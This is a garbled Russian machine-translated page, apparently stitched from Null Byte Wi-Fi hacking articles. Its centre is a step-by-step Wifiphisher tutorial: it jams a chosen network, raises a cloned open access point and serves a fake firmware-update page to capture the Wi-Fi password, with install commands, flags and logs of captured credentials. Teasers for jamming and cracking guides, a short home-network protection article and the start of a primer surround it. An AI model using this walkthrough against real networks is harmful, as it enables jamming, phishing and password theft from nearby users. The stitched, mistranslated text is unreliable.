Подмена ARP — это атака на сеть Ethernet или Wi-Fi, чтобы попасть между маршрутизатором и целевым пользователем.При ARP-спуфинге сообщения, предназначенные для цели, вместо этого отправляются злоумышленнику, позволяя злоумышленнику шпионить, отказывать в обслуживании или выполнять посреднические действия для цели. Одним из самых популярных инструментов для выполнения этой атаки является Ettercap, который предустановлен на Kali Linux.

Как взломать Wi-Fi:
Взлом паролей WPA2 с помощью новой атаки PMKID Hashcat

Взлом пароля для сетей WPA2 был примерно одинаковым в течение многих лет, но новая атака требует меньшего количества взаимодействия и информации, чем предыдущие методы, и имеет дополнительное преимущество, заключающееся в возможности целевого доступа к точкам доступа, к которым никто не подключен.Последняя атака на PMKID использует Hashcat для взлома паролей WPA и позволяет хакерам легче находить сети со слабыми паролями.

Как:
Обнаружение и классификация пакетов помех Wi-Fi с помощью NodeMCU

Наиболее распространенные атаки с блокировкой Wi-Fi используют пакеты деаутентификации и разъединения для атаки на сети.Это позволяет недорогому устройству на базе ESP8266, запрограммированному в Arduino, обнаруживать и классифицировать атаки типа «отказ в обслуживании» Wi-Fi, подсвечивая разные цветные светодиоды для каждого типа пакета. Шаблон этих цветов также может позволить нам отследить инструмент, используемый для атаки на сеть.

Как:
Запрограммируйте NodeMCU за 6 $ для обнаружения атак с помехами Wi-Fi в Arduino IDE

Хакеры и создатели часто группируются под одним ярлыком.В то время как хакеры используют компьютерные навыки для написания программ и поиска ошибок, производители используют электротехнику для создания аппаратных прототипов из микропроцессорных плат, таких как Arduino. Мы будем использовать оба набора навыков, чтобы запрограммировать NodeMCU за 6 долларов для отображения статуса соединения Wi-Fi через светодиод, что позволит нам отслеживать атаки с помехами.

Как:
Обнаружение скриптового кидди с Wi-Fi с помощью Wireshark

Из-за недостатков в работе Wi-Fi очень легко нарушить работу большинства сетей Wi-Fi, используя инструменты, которые подделывают пакеты деаутентификации.Легкость, с которой эти обычные инструменты могут блокировать сети, зависит только от того, насколько просто их обнаружить для любого, кто их слушает. Мы будем использовать Wireshark, чтобы обнаружить происходящую атаку Wi-Fi и определить, какой инструмент использует злоумышленник.

Как:
Отслеживайте устройства Wi-Fi и подключайтесь к ним с помощью Probequest

Устройства Wi-Fi постоянно излучают «зондирующие кадры», вызывая подключение к ближайшим сетям Wi-Fi.Помимо риска для конфиденциальности, пробные кадры также можно использовать для отслеживания или передачи данных на соседних устройствах. Мы объясним, как увидеть соседние устройства, излучающие зондовые кадры, с помощью Probequest и что можно сделать с этой информацией.

Как:
Используйте MDK3 для расширенного подавления Wi-Fi

Возможно, вы уже слышали о глушителе сигнала, который обычно относится к устройству, которое излучает достаточно сильный радиосигнал, чтобы заглушить прием соседних устройств, таких как сотовые телефоны.Специально изготовленное оборудование для подавления помех является незаконным во многих странах. Тем не менее, Wi-Fi уязвим к нескольким различным атакам с помехами, которые можно выполнить с помощью Kali Linux и адаптера беспроводной сети.

Как:
Взломай Wi-Fi и сети проще с Lazy Script

Инструменты Wi-Fi становятся все более и более доступными для начинающих, а скрипт LAZY представляет собой основу для серьезных инструментов проникновения, которые можно легко изучить изнутри.Этот мощный и простой инструмент может использоваться для всего: от установки новых дополнений до получения рукопожатия WPA за считанные секунды. Кроме того, его легко установить, настроить и использовать.

Как:
Руководство для начинающих по защите от взлома Wi-Fi

Взломать Wi-Fi намного проще, чем думает большинство людей, но способы сделать это сгруппированы вокруг нескольких распространенных методов, которые используют большинство хакеров.С помощью нескольких простых действий средний пользователь может пройти долгий путь защиты от пяти наиболее распространенных методов взлома Wi-Fi, которые включают взлом пароля, социальную инженерию, WPS-атаки, удаленный доступ и мошеннические точки доступа.

Как взломать Wi-Fi:
Отключение камер безопасности в любой беспроводной сети с помощью Aireplay-Ng

Тактика радиоэлектронной борьбы работает путем заклинивания, нарушения или отключения технологии, которую цель использует для выполнения критической функции, а устройства IoT особенно уязвимы для атак.Беспроводные камеры безопасности, такие как Nest Cam, часто используются для защиты критических мест, но хакер может хирургически отключить веб-камеру или другое устройство, подключенное к Wi-Fi, не нарушая работу остальной сети.

Как:
Взламывайте пароли Wi-Fi WPA2, используя приемы разума джедаев (и USB Dead Drops)

Последний фильм «Звездные войны», «Соло: история звездных войн», собрал почти 350 миллионов долларов по всему миру в течение своего первого месяца в кинотеатрах.Это хорошая возможность обсудить, как хакеры могут использовать медиа-рекламу (в данном случае, рекламу голливудских фильмов), чтобы разоружить ничего не подозревающего пользователя Windows, вставив в компьютер злую флешку.

Как взломать Wi-Fi:
Кража паролей Wi-Fi с помощью злой двойной атаки

Хотя сети Wi-Fi могут создавать умные ИТ-специалисты, это не означает, что пользователи системы так же технически подкованы.Мы покажем, как злая двойная атака может украсть пароли Wi-Fi, выгнав пользователя из доверенной сети, создав при этом почти идентичную поддельную. Это заставляет жертву подключаться к поддельной сети и предоставлять пароль Wi-Fi для восстановления доступа в Интернет.

Как взломать Wi-Fi:
Поиск и взлом WEP-сетей

Хотя безопасность сетей WEP была нарушена в 2005 году, современные инструменты сделали взлом их невероятно простым.В густонаселенных районах сети WEP можно найти в удивительных и важных местах по сей день, и их можно взломать за считанные минуты. Мы покажем вам, как это делают хакеры, и объясним, почему они должны быть осторожны, чтобы не взломать приманку.

Как:
Взламывайте пароли Wi-Fi WPA и WPA2 с помощью атаки Pixie-Dust с помощью Airgeddon

Недостатки конструкции во многих маршрутизаторах могут позволить хакерам украсть учетные данные Wi-Fi, даже если шифрование WPA или WPA2 используется с надежным паролем.Хотя такая тактика занимала до 8 часов, новая атака WPS Pixie-Dust может взломать сети за считанные секунды. Для этого для обнаружения уязвимых сетей используется современная инфраструктура беспроводных атак под названием Airgeddon, а затем Bully используется для их взлома.

Как:
Hack Open Hotel, самолет и кафе Wi-Fi с подменой MAC-адреса

После обнаружения и отслеживания близлежащих точек беспроводного доступа и подключенных к ним устройств хакеры могут использовать эту информацию для обхода некоторых типов безопасности, например, типа, используемого для точек доступа Wi-Fi в кафе, отелях и при полетах высоко над землей.Поменяв свой MAC-адрес на адрес уже подключенного, хакер может обойти фильтр MAC и свободно подключиться.

Как:
Используйте Kismet, чтобы наблюдать активность пользователей Wi-Fi через стены

В вашем доме есть стены для уединения, но сигналы Wi-Fi, проходящие через них, могут быть обнаружены на расстоянии до мили с помощью направленной антенны Wi-Fi и прямой видимости.Из этих данных можно узнать огромное количество информации, в том числе о том, когда жители приходят и уходят, о производителе всех ближайших беспроводных устройств и о том, что в сети используется в любой момент времени.

Видео:
Как взломать слабые пароли Wi-Fi за секунды с помощью Airgeddon в ОС Parrot

Слабый пароль — это короткий, общий или легко угадываемый пароль.В равной степени плохи и безопасные, но повторно используемые пароли, которые были утеряны небрежными сторонними компаниями, такими как Equifax и Yahoo. Сегодня мы будем использовать Airgeddon, среду беспроводного аудита, чтобы показать, как любой может взломать плохие пароли для беспроводных сетей WPA и WPA2 за считанные минуты или секунды только с помощью компьютера и сетевого адаптера.

Как взломать Wi-Fi:
Создайте программный Wi-Fi Jammer с Airgeddon

Airgeddon — это сетевой аудитор с поддержкой Bash, способный блокировать Wi-Fi.Эта возможность позволяет вам настраивать и отключать устройства от беспроводной сети, и все это без необходимости присоединяться к ней. Airgeddon работает на Kali Linux, и я покажу вам, как установить, настроить и использовать функции помех на небольшом и недорогом Raspberry Pi. Если все сделано правильно, он будет отказывать в обслуживании беспроводной сети для

.

Получите любой пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo

Несмотря на то, что взлому паролей и атакам с помощью настройки WPS-ПИН уделяется большое внимание, атаки на социальную инженерию являются самым быстрым способом получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, блокирующий Интернет до тех пор, пока отчаявшиеся пользователи не введут пароль Wi-Fi, чтобы включить поддельное обновление прошивки маршрутизатора.

Атаки социальной инженерии являются мощными, потому что они часто полностью обходят безопасность. Если вы можете обмануть сотрудника, введя пароль на поддельной странице входа, не имеет значения, насколько он надежен. Это противоположность взломанным атакам, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать огромный список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.

Знание того, насколько надежным является пароль, который вы атакуете, может разочаровать, поскольку затрачиваемое время и вычислительные мощности, связанные с атакой по словарю или грубой силой, может привести к тому, что провал будет казаться огромной тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.

Знает ли рядовой пользователь, как выглядит страница входа их маршрутизатора Wi-Fi? Заметят ли они, если бы это было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и утомленный, но срыв, все же введет свой пароль, чтобы включить поддельное обновление, даже если он заметит, что страница входа выглядит немного иначе?

Wifiphisher считает, что ответ «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, де-аутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для которой не требуется пароль для присоединения.Любому пользователю, который подключается к злой двойной сети, похожей на близнецов, предоставляется фишинговая страница с требовательным паролем Wi-Fi для обновления прошивки, что объясняется тем, что Wi-Fi перестала работать.

Обновление прошивки из ада

Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Во-первых, отключается Wi-Fi. Они по-прежнему могут видеть сеть, но каждая попытка подключиться к ней немедленно терпит неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.

Именно тогда они замечают новую сеть с тем же именем, что и у старой сети, но не требуют пароля. После нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети, опасаясь, что их маршрутизатор внезапно транслирует сеть без пароля, к которому любой может присоединиться. Как только они присоединяются, открывается официальная веб-страница, на которой упоминается производитель их маршрутизатора, и информирует их о критическом обновлении прошивки маршрутизатора.Пока они не введут пароль, чтобы применить обновление, интернет не будет работать.

После ввода супер-защищенного пароля Wi-Fi экран загрузки начинает ползти по экрану при перезапуске маршрутизатора, и они испытывают небольшую гордость за серьезное отношение к безопасности своего маршрутизатора после установки этого критического обновления. После минуты ожидания их устройства снова подключаются к сети, теперь они стали более безопасными благодаря установленному обновлению.

Easy Access с Bossy Update

Для хакера получить пароли так же просто, как выбрать сеть, на которую вы хотите настроить таргетинг.После назначения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, максимально увеличивая вероятность того, что кто-то, подключенный к сети, будет разочарован и применяет фиктивное обновление. Затем информация о сети цели клонируется, и поддельная сеть Wi-Fi транслируется, чтобы заставить цель думать, что ее маршрутизатор работает в каком-то неопределенном режиме обновления.

Подключающиеся устройства немедленно регистрируются в списке, и страница фишинга настраивается в соответствии с производителем маршрутизатора путем считывания первой части его MAC-адреса.После обмана любого из подключенных к целевой сети целей ввода пароля Wifiphisher информирует хакера, затрачивая время. После отправки захваченного пароля цель жестоко занята как экраном загрузки поддельных обновлений, так и таймером искусственной перезагрузки, чтобы выиграть время для проверки хакером захваченного пароля.

Что вам понадобится

Чтобы эта атака работала, вам потребуется адаптер беспроводной сети, совместимый с Kali Linux. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, который поддерживает режим мониторинга и внедрение пакетов, по ссылке ниже.

How to Hack Wi-Fi: Get Anyone Слева направо, начиная сверху: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Image by Kody / Null Byte

Помимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.

Шаг 1. Установка Wifiphisher

Для начала мы можем открыть окно терминала и набрать apt install wifiphisher для установки Wifiphisher.

  ~ # apt установить wifiphisher

Чтение списков пакетов ... Готово
Построение дерева зависимостей
Чтение информации о состоянии ... Готово
wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1).
Следующие пакеты были установлены автоматически и больше не требуются:
  dh-python libdouble-translation1 liblinear3
Используйте «apt autoremove», чтобы удалить их.0 обновлено, 0 вновь установлено, 0 для удаления и 1891 не обновлено.  

Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это путем клонирования репозитория и следуя инструкциям на странице GitHub, например:

  ~ # git clone https://github.com/ wifiphisher / wifiphisher.git
~ # CD Wifiphisher
~ # sudo python setup.py install  

Это должно установить Wifiphisher, который вы можете начать, просто набрав имя программы в окне терминала.

Шаг 2. Просмотрите флаги Wifiphisher

Вы сможете запустить скрипт в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя Wifiphisher не имеет справочной страницы, вы можете увидеть на ее странице —help , что у нее есть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив в команду различные флаги.

  ~ # wifiphisher --help

использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE]
                   [-aI APINTERFACE] [-iI INTERNETINTERFACE]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [-kN] [-nE] [-nD]
                   [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS...]] [-e ESSID]
                   [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
                   [--payload-path PAYLOAD_PATH] [-cM] [-wP]
                   [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
                   [-pPD PHISHING_PAGES_DIRECTORY]
                   [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

необязательные аргументы:
  -h, --help показать это справочное сообщение и выйти
  -i ИНТЕРФЕЙС, --интерфейс ИНТЕРФЕЙС
                        Вручную выберите интерфейс, который поддерживает как AP, так и
                        режимы мониторинга для порождения мошеннических AP, а также
                        установка дополнительных атак Wi-Fi с расширений
                        (я.е. deauth). Пример: -i wlan1
  -eI EXTENSIONSINTERFACE, - Расширения интерфейса EXTENSIONSINTERFACE
                        Вручную выберите интерфейс, который поддерживает монитор
                        режим для деаутентификации жертв. Пример: -eI
                        WLAN1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Вручную выберите интерфейс, который поддерживает режим AP для
                        порождая изгоев AP. Пример: -aI wlan0
  -iI ИНТЕРНЕТИНТЕРФЕЙС, --интерфейс ИНТЕРНЕТИНТЕРФЕЙС
                        Выберите интерфейс, который подключен на
                        InternetExample: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Укажите MAC-адрес интерфейса AP
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Укажите MAC-адрес интерфейса расширений
  -iNM, --no-mac-рандомизация
                        Не меняйте MAC-адрес
  -kN, --keepnetworkmanager
                        Не убивайте NetworkManager
  -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить фазу деаутентификации.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channel DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Каналы до конца. Пример: --deauth-channel 1,3,7
  -e ESSID, --essid ESSID
                        Введите ESSID мошеннической точки доступа. Этот вариант
                        пропустит этап выбора точки доступа. Пример:
                        --essid 'Бесплатный WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        По умолчанию все BSSID в WLAN с этим ESSID.-P PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Выберите сценарий фишинга для запуска.
                        пропустить этап выбора сценария. Пример: -p
                        Обновление прошивки
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Добавьте защиту WPA / WPA2 на мошенническую точку доступа.
                        Пример: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Захват рукопожатий WPA / WPA2 для проверки
                        passphraseExample: -hC capture.PCAP
  -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары
                        полномочий
  -lC, --lure10-capture
                        Захват BSSID обнаруженных точек доступа
                        на этапе выбора AP. Эта опция является частью
                        Lure10 атаки.
  -lE LURE10_EXPLOIT, --lure10-эксплойт LURE10_EXPLOIT
                        Обмани сервис Windows Location соседних окон
                        пользователи считают, что это в пределах области, которая была
                        ранее захваченный с помощью --lure10-capture.Часть
                        Lure10 атаки.
  - logging Журнал активности в файл
  -dK, --disable-karma Отключает атаку KARMA
  -LP LOGPATH, --logpath LOGPATH
                        Определите полный путь файла журнала.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Определите полный путь к файлу, который будет хранить
                        любые захваченные учетные данные
  --payload-path PAYLOAD_PATH
                        Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку
  -cM, --channel-monitor
                        Отслеживайте, меняет ли целевая точка доступа канал.-wP, --wps-pbc Монитор, если кнопка на регистраторе WPS-PBC
                        нажат.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        Интерфейс WLAN, используемый для связи с WPS
                        Точка доступа.
  -kB, --known-beacons Передача нескольких кадров радиомаяка
                        популярные WLAN
  -fH, --force-hostapd Принудительно использовать установленный в системе hostapd.
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Поиск фишинговых страниц в этом месте
  --dnsmasq-conf DNSMASQ_CONF
                        Определите полный путь пользовательского dnmasq.Conf файл
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Определите ESSID, который вы хотите использовать для фишинга
                        страница  

Шаг 3. Подключите адаптер беспроводной сети

Теперь самое время подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного монитора, если вы сами этого не сделаете.

Хороший адаптер дальней связи на Amazon: беспроводной USB-адаптер Alfa AWUS036NHA B / G / N — 802.11n — 150 Мбит / с — 2,4 ГГц — 5 дБи Антенна

Шаг 4. Запустите сценарий

Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавлю имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто захватит любой сетевой адаптер, который сможет.

Чтобы запустить скрипт, я запущу следующую команду.

  ~ # wifiphisher -i wlan1  

После этого мы должны увидеть страницу с каждой ближайшей сетью.Мы можем выбрать сеть, которую мы хотим атаковать, и нажать . Введите .

  Опции: [Esc] Выйти [Стрелка вверх] Двигаться вверх [Стрелка вниз] Двигаться вниз

  ESSID BSSID CH PWR ENCR КЛИЕНТЫ ПОСТАВЩИК
_________________________________________________________________________________________
│ Исследовательская группа CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │
│ ██████████████ ██████████████ ███ 100% WPA2 2 Белкин Интернэшнл │
│ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │
│ ██████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │
│ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │
│ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Белкин Интернэшнл │
│ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │
│ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│
│ ██████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │
│ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │
│ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │
│ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │
│ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │
│ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │
│ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │
│ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│
│ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │
│ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │
│ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │
│ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │
│ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │
│ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │
│ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│
│ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Arris Group │
│ ██████████ ██████████████ ███ 46% WPA2 0 Tp-link Technologies │
│ ██████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │
-------------------------------------------------- ——————————————————————————————————————  

Далее скрипт спросит, какая атака ты хочешь бежать. Выберите опцию 2.

  Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз

Доступные сценарии фишинга:

1 - Сетевой менеджер Connect
        Имитирует поведение сетевого менеджера.Этот шаблон показывает страницу Chrome «Ошибка подключения» и отображает окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые менеджеры Windows и MAC OS.

2 - Страница обновления прошивки
        Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающих пароль WPA / WPA2 из-за обновления прошивки. Mobile удобно.

3 - Страница входа в OAuth
        Бесплатный сервис Wi-Fi, запрашивающий учетные данные Facebook для аутентификации с использованием OAuth

4 - Обновление плагина браузера
        Универсальная страница обновления плагинов для браузера, которая может использоваться для доставки полезных данных жертвам. 

После выбора атаки она сразу запускается. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и создаст поддельные версии, чтобы заманить эти устройства в соединение.

  Фид расширения: if Wifiphisher 1.4GIT
DEAUTH / DISAS - ██████████████████ │ ESSID:
DEAUTH / DISAS - ██████████████████ │ Источник: 11
                                        │ интерфейс AP: wlan1
                                        │ Опции: [ESC] Выйти
                                        │ _________________________
Связанные жертвы:

HTTPS-запросы: , 

,

. После присоединения цели всплывающее окно потребует ввода пароля.

How to Hack Wi-Fi: Get Anyone

Когда цель вводит пароль, мы получаем уведомление на экране Wifiphisher.

  Фид расширения:
DEAUTH / DISAS - ██████████████████
DEAUTH / DISAS - ██████████████████
DEAUTH / DISAS - ██████████████████
Жертва ██████████████████ проверила WLAN с помощью ESSID: «FakeNed» (KARMA)
Жертва ██████████████████ исследовала WLAN с помощью ESSID: «Хармонд Фернандес» (Evil Twin)

Связанные жертвы:
██████████████████ 10.0.0.13 Apple iOS / MacOS
██████████████████ 10.0.0.29 Мурата Производство

HTTPS-запросы:
[*] ПОЛУЧИТЬ запрос от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html
[*] ПОЛУЧИТЬ запрос от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html
[*] ПОЛУЧИТЬ запрос от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html
[*] POST-запрос от 10.0.0.13 с wfphshr-wpa-password = myfatpassword
[*] ПОЛУЧИТЕ запрос от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html  

Вот и все! Сценарий выйдет и предоставит вам только что захваченный пароль.

  [*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10
[+] Часовой пояс обнаружен. Установка диапазона каналов на 1-13
[+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации
[+] Выбор интерфейса wlan1 для создания мошеннической точки доступа
[+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5
[!] MAC-адрес не может быть установлен. (Пробовал 00: 00: 00: ee: 5c: 95)
[+] Отправка SIGKILL в wpa_supplicant
[+] Отправка SIGKILL в клиент
[+] Отправка SIGKILL в клиент
[+] Отправка SIGKILL в NetworkManager
[*] Очищен лизинг, запущен DHCP, настроен iptables
[+] Выбор шаблона страницы обновления прошивки
[*] Запуск поддельной точки доступа...
[*] Запуск HTTP / HTTPS-сервера на портах 8080, 443
[+] Покажите свою поддержку!
[+] Следуйте за нами: https://twitter.com/wifiphisher
[+] Как и мы: https://www.facebook.com/Wifiphisher
[+] Захваченные учетные данные:
wfphshr-ВП-пароль = myfatpassword
[!] Закрытие  

Точно так же вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашей поддельной сети. Хуже того, они все еще застряли за этим ужасным медленным, поддельным экраном загрузки.

How to Hack Wi-Fi: Get Anyone

Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.

How to Hack Wi-Fi: Get Anyone Image by Kody / Null Byte

Надеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже, и не стесняйтесь связаться со мной в Twitter @KodyKinzie.

Начало взлома сегодня: настройка платформы для взлома Raspberry Pi без головы под управлением Kali Linux

Хотите начать зарабатывать как хакер в белой шляпе? Начните свою карьеру хакера в белой шляпе с нашим Премиальным учебным комплектом по сертификации этики для взлома 2020 года из нового магазина Null Byte Shop и получите более 60 часов обучения от профессионалов по этике.

Купить (скидка 90%)>

Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты от Kody / Null Byte

,

Как проверить, был ли взломан мой домашний интернет / Wi-Fi

Если ваша домашняя сеть Интернет или WiFi в последнее время работала медленнее, чем обычно, это может быть вызвано тем, что она была взломана. Хакер может использовать вашу сеть для различных действий, включая нелегальную загрузку развлекательных файлов, таких как музыкальные списки воспроизведения и видео, и даже кражу вашей личной информации.

Итак, как вы можете проверить, использует ли кто-то еще вашу сеть для злонамеренных действий?

Вам следует начать с проверки устройств, связанных с вашим маршрутизатором.Таким образом, вы можете увидеть, сколько устройств зарегистрировано в вашей сети, и если какое-либо из них не выглядит знакомым. Вот что нужно сделать: войдите в свой маршрутизатор, введя его IP-адрес прямо в адресную строку браузера. В большинстве установок http://192.168.0.1 или http://192.168.1.1 должны работать, или они могут быть записаны на самом маршрутизаторе вместе с именем пользователя и паролем, с которыми вы должны войти.

После входа в систему посмотрите раздел Подключенные устройства или Список устройств , в котором вы найдете список всех IP-адресов, которые в настоящее время используются в вашей сети.К сожалению, не все устройства будут иметь имя, которое делает их легко узнаваемыми (например, iPhone Питера или ноутбук Джека), что означает, что вам нужно будет определить IP-адрес для каждого устройства.

Чтобы предотвратить взлом вашей системы, вы должны проверить, использует ли ваш маршрутизатор WEP (тип протокола аутентификации) в качестве метода безопасности. Если это так, это означает, что ваш маршрутизатор очень старый и уязвим для кибератак. Если вы приобрели свой маршрутизатор за последние 5 лет, он должен поддерживать более безопасный протокол аутентификации, такой как WPA или WPA2.Вы можете проверить это, войдя в свой маршрутизатор со своего ноутбука, где вы можете найти Wireless Settings и выбрать предпочитаемый протокол аутентификации. Также убедитесь, что вы изменили пароль WPA2 на длинную фразу, которая представляет собой комбинацию цифр, букв и символов, таких как #% * <$?! = +.

Вот несколько простых шагов, которые нужно выполнить, чтобы убедиться, что ваша сеть не взломана:

  • Измените пароль администратора по умолчанию на вашем маршрутизаторе
  • Скрыть ваш SSID — SSID — это имя вашей сети (например, Peter’s WiFi), и вы можете скрыть его, чтобы он не был виден другим
  • IP-фильтрация — блокирует ваш IP-адрес; однако, имейте в виду, что хакеры знают, как легко изменить IP-адрес
  • Фильтрация MAC — Это очень безопасный метод, если вы пользователь MAC, поскольку он блокирует устройство через уникальный аппаратный адрес, который выдается в процессе производства.

Ниже приведены шаги, которые необходимо предпринять, чтобы убедиться, что ваша домашняя сеть Интернет не используется хакерами. Если у вас есть какие-либо вопросы по теме, оставьте комментарий ниже или напишите нам @JustAskGemalto, и мы будем рады ответить на них все!

,

Начало работы с условиями и технологиями «Null Byte :: WonderHowTo

С возвращением, мои хакерские стажеры!

Множество моих читателей просили уроки о том, как взломать Wi-Fi, поэтому в этой статье я начинаю новую серию, посвященную взлому Wi-Fi. Вероятно, это будет около 6-9 статей, начиная с основ технологий.

How to Hack Wi-Fi: Getting Started with Terms & Technologies Изображение через Shutterstock

Я слышу, как вы все стонете, но вам нужно знать основы, прежде чем вы приступите к более сложному взлому.Тогда, надеюсь, разрабатывать свои собственные хаки.

После этого в следующих руководствах будут рассмотрены способы защиты от атак, атаки DOS, взлом паролей (WEP, WPA, WPA2, WPS и WPA-enterprise), мошеннические точки доступа, злые близнецы, Wi-Fi MitM и отслеживание Wi-Fi. Наконец, мы рассмотрим, как взломать Bluetooth (да, я знаю, технически это не Wi-Fi, но я думаю, вам будет интересно).

Итак, приезжайте на эту частую и усиленную поездку по взлому Wi-Fi!

Шаг 1: Терминология

Чтобы действительно понять, как взломать Wi-Fi, нам нужно обойтись без основных терминов и технологий.Во-первых, давайте обратимся к некоторой терминологии.

Для начала, точка доступа, которая отправляет радиочастотный (RF) сигнал, называется AP. Эти точки доступа могут отправлять сигналы (от 2,4 до 5 ГГц), которые соответствуют ряду различных стандартов. Эти стандарты известны как 802.11a, 802.11b, 802.11g и 802.11n. В самое ближайшее время мы увидим новый стандарт, который предварительно называется 802.11ac.

В таблице ниже приведены основные характеристики этих стандартов Wi-Fi.

How to Hack Wi-Fi: Getting Started with Terms & Technologies

Эти стандарты, как правило, обратно совместимы, так что беспроводной адаптер n также сможет принимать сигналы g и b. Мы сосредоточимся на наиболее широко используемом из этих стандартов — b, g и n.

Шаг 2. Технологии безопасности

